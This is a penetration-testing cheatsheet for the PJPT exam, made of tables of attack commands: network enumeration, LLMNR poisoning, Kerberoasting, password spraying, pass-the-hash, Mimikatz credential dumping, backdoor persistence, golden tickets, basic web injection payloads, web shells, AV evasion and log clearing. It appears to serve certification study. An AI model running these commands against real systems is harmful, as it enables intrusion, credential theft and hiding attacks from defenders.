# PJPT (Practical Junior Penetration Tester) Cheatsheet

## Initial Enumeration (Internal Network)

| Task | Tool/Command | Example | Notes |
|------|--------------|---------|-------|
| Network Discovery | Nmap | `nmap -sn 192.168.1.0/24` | Identify live hosts |
| | Ping sweep | `for i in {1..254}; do (ping -c 1 192.168.1.$i \| grep "bytes from" &); done` | Quick host discovery |
| | ARP scan | `arp-scan --interface=eth0 --localnet` | More reliable on local network |
| | Netdiscover | `netdiscover -r 192.168.1.0/24` | Passive ARP reconnaissance |
| | Responder | `responder -I eth0 -A` | Analyze mode to see NBT-NS/LLMNR traffic |
| Port Scanning | Nmap | `nmap -sV -sC -p- 192.168.1.100` | Full port scan with service detection |
| | Rustscan | `rustscan -a 192.168.1.100 -- -sV -sC` | Faster initial scan |
| Domain Info | Enum4linux | `enum4linux -a 192.168.1.100` | Windows/Samba system enumeration |
| | Nbtscan | `nbtscan 192.168.1.0/24` | NetBIOS name scanning |
| | Ldapsearch | `ldapsearch -x -h 192.168.1.100 -s base namingcontexts` | LDAP query for naming contexts |
| | PowerView | `Get-Domain` | PowerShell-based AD reconnaissance |
| SMB Enumeration | SMBclient | `smbclient -L //192.168.1.100 -N` | List shares anonymously |
| | SMBmap | `smbmap -H 192.168.1.100` | Map shares and permissions |
| | CrackMapExec | `crackmapexec smb 192.168.1.0/24` | Network-wide SMB checking |

## Active Directory Attack Vectors

| Attack Vector | Tool/Command | Example | Notes |
|---------------|--------------|---------|-------|
| **LLMNR/NBT-NS Poisoning** ||||
| Capture hashes | Responder | `responder -I eth0 -wrf` | Capture NTLM hashes from traffic |
| Relay attacks | ntlmrelayx | `ntlmrelayx.py -tf targets.txt -smb2support` | Relay captured credentials |
| Disable LLMNR | PowerShell | `Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows NT\DNSClient" -Name EnableMulticast -Type DWord -Value 0` | Mitigation: disable LLMNR |
| **Kerberoasting** ||||
| Enumerate SPNs | PowerShell | `setspn -T domain -Q */*` | Find Service Principal Names |
| Request tickets | PowerView | `Get-DomainUser -SPN \| Get-DomainSPNTicket` | Request service tickets |
| | Rubeus | `Rubeus.exe kerberoast /outfile:hashes.txt` | Request and extract tickets |
| | Impacket | `GetUserSPNs.py -request -dc-ip 192.168.1.100 domain/user` | Extract Kerberos tickets |
| Crack tickets | Hashcat | `hashcat -m 13100 tickets.txt wordlist.txt` | Crack service tickets |
| **Password Spraying** ||||
| Domain users | Kerbrute | `kerbrute passwordspray -d domain.local --dc 192.168.1.100 users.txt Password123` | Test one password against many users |
| | CrackMapExec | `crackmapexec smb 192.168.1.100 -u users.txt -p Password123` | SMB password spraying |
| | DomainPasswordSpray | `Invoke-DomainPasswordSpray -Password 'Spring2023!'` | PowerShell-based spraying |
| **AS-REP Roasting** ||||
| Enumerate users | PowerView | `Get-DomainUser -PreauthNotRequired` | Find users with Kerberos pre-auth disabled |
| Get tickets | Rubeus | `Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt` | Extract AS-REP hashes |
| | Impacket | `GetNPUsers.py domain/ -no-pass -usersfile users.txt` | Extract AS-REP hashes |
| Crack hashes | Hashcat | `hashcat -m 18200 asrep.txt wordlist.txt` | Crack AS-REP hashes |
| **Bloodhound** ||||
| Collect data | SharpHound | `SharpHound.exe -c All` | Collect AD info |
| | Python | `bloodhound-python -u user -p password -d domain.local -ns 192.168.1.100 -c All` | Python-based collector |
| Import data | BloodHound | GUI: Upload data files | Analyze attack paths |
| Find paths | BloodHound | Queries: "Shortest Path to Domain Admins" | Identify privilege escalation paths |

## Local Privilege Escalation

| Method | Tool/Command | Example | Notes |
|--------|--------------|---------|-------|
| **Windows** ||||
| Initial enumeration | WinPEAS | `winPEASany.exe` | Automated privilege escalation checks |
| | PowerUp | `Invoke-AllChecks` | PowerShell-based enumeration |
| Service vulnerabilities | PowerUp | `Get-ServiceUnquoted` | Find unquoted service paths |
| | PowerUp | `Get-ModifiableServiceFile` | Find modifiable service binaries |
| Kernel exploits | Watson | `Watson.exe` | Find kernel vulnerabilities |
| | Windows-Exploit-Suggester | `windows-exploit-suggester.py --database 2023-04-15-mssb.xls --systeminfo sysinfo.txt` | Match patches against exploits |
| Token impersonation | Incognito | `incognito_cmd_exe list_tokens -u` | List available tokens |
| | Rotten Potato | `rottenpotato.exe` | Token impersonation technique |
| DLL hijacking | Process Monitor | Filter for "NAME NOT FOUND" + "PATH" | Find missing DLLs |
| **Linux** ||||
| Initial enumeration | LinPEAS | `./linpeas.sh` | Automated privilege escalation checks |
| | Linux Smart Enumeration | `./lse.sh -l 2` | Level 2 verbosity enumeration |
| SUID binaries | Find | `find / -perm -u=s -type f 2>/dev/null` | Find SUID executables |
| Sudo rights | Sudo | `sudo -l` | List allowed sudo commands |
| Kernel exploits | Linux-Exploit-Suggester | `./linux-exploit-suggester.sh` | Match kernel against known exploits |
| Cron jobs | Check crontab | `cat /etc/crontab` | Find scheduled tasks |
| | Pspy | `./pspy64` | Monitor processes without root |
| Capabilities | Check caps | `getcap -r / 2>/dev/null` | Find binaries with capabilities |
| Path abuse | PATH variable | `echo $PATH` | Check for writeable directories in PATH |

## Lateral Movement Techniques

| Technique | Tool/Command | Example | Notes |
|-----------|--------------|---------|-------|
| **Pass the Hash** ||||
| PtH with CrackMapExec | CrackMapExec | `crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206e4aa04820ee3a93175` | Use hash instead of password |
| PtH with Impacket | Impacket | `psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206e4aa04820ee3a93175 administrator@192.168.1.100` | Execute commands via SMB |
| **WMI** ||||
| Remote execution | WMIexec | `wmiexec.py domain/user:password@192.168.1.100` | Execute commands via WMI |
| | PowerShell | `Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\output.txt" -ComputerName TARGETPC` | PowerShell-based WMI |
| **PowerShell Remoting** ||||
| PSRemoting | PowerShell | `Enter-PSSession -ComputerName TARGETPC` | Interactive PowerShell session |
| | PowerShell | `Invoke-Command -ComputerName TARGETPC -ScriptBlock {whoami}` | Execute remote command |
| **Other Methods** ||||
| RDP | RDesktop | `rdesktop -u user -p password 192.168.1.100` | GUI access (Linux client) |
| | Xfreerdp | `xfreerdp /u:user /p:password /v:192.168.1.100` | Better RDP client for Linux |
| Mimikatz | Mimikatz | `sekurlsa::logonpasswords` | Extract plaintext credentials |
| | PowerShell | `Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'` | PowerShell-based Mimikatz |

## Post Exploitation & Persistence

| Task | Tool/Command | Example | Notes |
|------|--------------|---------|-------|
| **Data Exfiltration** ||||
| SMB | SMBclient | `smbclient \\\\192.168.1.100\\share -U user%password` | Transfer via SMB |
| Web-based | SimpleHTTPServer | `python3 -m http.server 8000` | Host files on attacker machine |
| | Wget/cURL | `wget http://192.168.1.100:8000/file` | Download from victim |
| | PowerShell | `Invoke-WebRequest -Uri "http://192.168.1.100:8000/file" -OutFile "C:\file"` | PowerShell download |
| **Persistence** ||||
| Scheduled tasks | Schtasks | `schtasks /create /tn "MyTask" /tr "C:\evil.exe" /sc daily /ru "SYSTEM"` | Create persistent task |
| Registry | Reg | `reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\evil.exe"` | Run key persistence |
| Service | SC | `sc create "Backdoor" binpath= "cmd.exe /k C:\evil.exe"` | Create persistent service |
| Golden Ticket | Mimikatz | `kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-X-Y-Z /krbtgt:krbtgthash /ptt` | Create Kerberos golden ticket |

## Web Application Security Testing

| Category | Tool/Command | Example | Notes |
|----------|--------------|---------|-------|
| **Scanning** ||||
| Directory discovery | Gobuster | `gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt` | Find hidden directories |
| | Dirsearch | `dirsearch -u http://192.168.1.100` | Python-based directory scanner |
| Vulnerability scanning | Nikto | `nikto -h http://192.168.1.100` | General web vulnerability scanner |
| | WPScan | `wpscan --url http://192.168.1.100 --enumerate u` | WordPress vulnerability scanner |
| **Manual Testing** ||||
| SQL Injection | sqlmap | `sqlmap -u "http://192.168.1.100/page.php?id=1" --dbs` | Automated SQL injection |
| | Manual | `' OR 1=1 --` | Basic SQL injection test |
| XSS | Manual | `<script>alert(1)</script>` | Basic XSS test |
| Command Injection | Manual | `; whoami` | Basic command injection test |
| File inclusion | Manual | `../../etc/passwd` | LFI test |
| **Web Shells** ||||
| PHP shell | Weevely | `weevely generate password /path/to/shell.php` | Generate obfuscated PHP shell |
| | Upload | Via vulnerable file upload or LFI/RFI | Get web shell access |
| JSP shell | Web-shell | Use platform-specific shells | JSP for Tomcat servers |
| | Upload | Via vulnerable file upload or LFI/RFI | Get web shell access |
| ASPX shell | Web-shell | Use platform-specific shells | ASPX for IIS servers |
| | Upload | Via vulnerable file upload or LFI/RFI | Get web shell access |

## Basic Evasion Techniques

| Technique | Tool/Command | Example | Notes |
|-----------|--------------|---------|-------|
| **AV Evasion** ||||
| Payload obfuscation | Veil | `./Veil.py` | Generate AV-evading payloads |
| | Shellter | `shellter -a -f legit.exe -p custom` | Inject payload into legitimate binary |
| PowerShell obfuscation | Invoke-Obfuscation | `Invoke-Obfuscation` | Obfuscate PowerShell scripts |
| **Detection Evasion** ||||
| Clear logs | Wevtutil | `wevtutil cl System` | Clear Windows event logs |
| | PowerShell | `Clear-EventLog -LogName Security` | PowerShell-based log clearing |
| Clear bash history | Bash | `history -c && rm ~/.bash_history` | Clear bash history |
| Disable auditing | Auditpol | `auditpol /set /category:"System" /success:disable /failure:disable` | Disable system auditing |

## PJPT Exam Preparation Tips

| Area | Focus On | Example Tools |
|------|----------|--------------|
| Active Directory | LLMNR/NBT-NS poisoning, Kerberoasting, AS-REP roasting | Responder, Impacket, Rubeus |
| Windows privilege escalation | Service misconfigurations, token impersonation | PowerUp, WinPEAS |
| Linux privilege escalation | SUID binaries, sudo rights | LinPEAS, GTFOBins |
| Lateral movement | Pass-the-hash, Mimikatz | CrackMapExec, Impacket |
| Web vulnerabilities | SQL injection, file inclusion | sqlmap, manual testing |